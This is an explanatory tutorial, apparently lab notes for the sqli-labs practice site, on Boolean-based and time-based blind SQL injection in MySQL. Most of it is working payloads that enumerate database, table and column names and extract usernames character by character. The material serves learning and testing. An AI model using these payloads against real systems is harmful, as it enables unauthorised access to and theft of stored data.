SQL injection: Boolean-based blind injection and time-based blind injection

SQL injection: Boolean-based blind injection and time-based blind injection

Boolean-based blind injection

Guessing the database name
?id=1' and length(database())=8-- -
?id=1' and length(database())>8-- -
Each payload closes the application's quoted string with ' and ends with a comment (-- -, --+ which URL-decodes to "-- ", or %23 which is #) so the remainder of the original query is discarded. The page then either renders the id=1 row (condition true) or shows nothing (condition false); that one bit per request is all a Boolean-blind probe gets back.
First character of the current database name: take it with left() and narrow it down by comparison
id=1' and left(database(),1)>'a' -- -
id=1' and left(database(),1)>'z' -- -
true for >'a' and false for >'z': the character lies between a and z
id=1' and left(database(),1)>'r' -- -
id=1' and left(database(),1)>'s' -- -
true for >'r' and false for >'s': the first character is s; then extend the prefix one character at a time
id=1' and left(database(),2)>'sa'-- -
Note that these are string comparisons under the column's collation, which is case-insensitive for MySQL's default _ci collations, so left() cannot tell 's' from 'S'; comparing ascii()/ord() code values, as in the probes below, is exact.

Guessing table names
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
a is the table index starting at 0 (limit a,1 returns the a-th table name), b is the character position starting at 1, and n is the decimal ASCII value being compared against
substr("abc",1,1)  substring function: start at position 1, take one character, returns a
substr("abc",2,1)  start at position 2, take one character, returns b
substr("abc",1,2)  start at position 1, take two characters, returns ab
substr("abc",0,1)  returns the empty string: MySQL positions start at 1, unlike PHP's substr(), which starts at 0
First table
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
(select table_name from information_schema.tables where table_schema=database() limit 0,1) returns the first table name
substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1) takes its first character
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>102
(101 is the ASCII code of e)
Second table
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101

Checking the columns of the users table

/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100%23
(the sqli-labs table is users, as in the payload further down; a bare table_name condition can also match a same-named table in another schema, so add  and table_schema=database()  to the where clause when that matters)

Dumping column values
ord() can replace ascii() and mid() can replace substr() when a filter blocks those function names:

sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -
IFNULL(...,0x20) substitutes a space for a NULL value so that the comparison does not itself become NULL; 68 is the ASCII code of D.

Reference: https://blog.csdn.net/weixin_53324462/article/details/113800035

Time-based blind injection

When the page shows the same output whether the injected condition is true or false, the response time carries the answer instead.
sleep(X) delays the response by X seconds
?id=1' and sleep(5)-- -
if(condition,x,y) returns x when the condition is true, otherwise y
?id=1' and if(1=1,1,sleep(1))  returns 1, so the response comes back immediately
?id=1' and if(1=2,1,sleep(1))  the response comes back after a 1-second delay
Because the injected expression is and-ed onto the row condition, MySQL evaluates it only for rows where id='1' holds, and it evaluates sleep() once per such row: an id that matches no row never sleeps at all, and one that matches several rows delays several times as long. Measure the normal response time first and pick a delay clearly longer than network jitter, otherwise a slow but honest response is misread as a true condition.

?id=1' and if(length(database())>8,sleep(2),0)-- -
?id=1' and if(length(database())>=8,sleep(5),1)-- -
Determining the database name
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0)--+
?id=1' and if(ascii(substr(database(),1,1))>95,sleep(6),1)-- -
(115 is the ASCII code of s)
Determining table names
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit x,y),z,d))=e,sleep(1),0)-- -
x is the table index starting at 0 and y is 1 (one table per probe); z is the character position starting at 1 and d is 1 (one character); e is the ASCII value being tested
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(2),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,sleep(3),0)--+

Reference: https://blog.csdn.net/qq_51954912/article/details/116100446